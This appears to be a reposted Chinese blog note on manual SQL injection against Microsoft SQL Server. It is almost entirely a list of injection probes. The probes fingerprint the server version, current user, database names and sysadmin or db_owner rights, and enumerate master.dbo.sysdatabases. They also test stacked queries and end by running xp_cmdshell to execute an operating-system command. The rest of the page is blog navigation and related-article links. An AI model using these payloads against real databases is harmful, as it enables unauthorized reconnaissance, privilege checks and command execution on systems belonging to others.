博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
mssql手工注入心的
阅读量:4635 次
发布时间:2019-06-09

本文共 1020 字,大约阅读时间需要 3 分钟。

select * from T_user where exists (select * from sysobjects) ;//判断是否存在sysobjects表,默认的select * from T_user where exists (select * from T_user);//判断是否存在XX表select * from T_user where 1=(@@version);//数据库版本号select * from T_user where 1=(user_name());//获取当前用户select * from T_user where 1=(@@servername);//获取当前服务器名称select * from T_user where 1=user;//获取当前用户名select * from T_user where 1=(@@spid);//当前mssql的进程idselect * from T_user where 1=(db_name());//获取当前数据库名称select * from T_user where 1=(is_srvrolemember('sysadmin'));//是否是sysadminselect * from T_user where 1=(is_member('db_owner'));//是否是数据库拥有者select * from T_user where 1=(has_dbaccess('master'));//是否拥有数据库读写权限select * from T_user where 1=(select filename from master.dbo.sysdatabases where dbid=5 ); //查询服务器上的所有数据库,根据数据库的dbidselect * from master.dbo.sysdatabases;//查询主库select * from T_user where 1=1;declare @d int ;//是否支持多行查询select * from T_user where 1=1;execute master.dbo.xp_cmdshell 'tree C:\';

 

转载于:https://www.cnblogs.com/beyond1983/archive/2013/04/16/3023703.html

你可能感兴趣的文章
0 - python简介
查看>>
第20章 使用LNMP架构部署动态网站环境
查看>>
meson 中调用shell script
查看>>
相关博客
查看>>
Servlet运行原理以及生命周期
查看>>
Linux学习之三-Linux系统的一些重要配置文件
查看>>
转 [JAVA] 使用 common-fileupload 实现文件上传
查看>>
十五天精通WCF——第三天 client如何知道server提供的功能清单
查看>>
构建之法阅读笔记04
查看>>
Python - selenium_WebDriver 鼠标键盘事件
查看>>
oracle创建DBLink连接
查看>>
spark+openfire即时通讯工具二次开发参考文档
查看>>
java.util.concurrent包API学习笔记
查看>>
从技术细节看美团的架构
查看>>
Odoo进销存业务学习笔记
查看>>
c++标准库 及 命名空间std
查看>>
【POJ1113】Wall(凸包)
查看>>
SD.Team颜色代码大全
查看>>
使用按钮控制HTML5背景音乐开关
查看>>
[spring-boot] 多环境配置
查看>>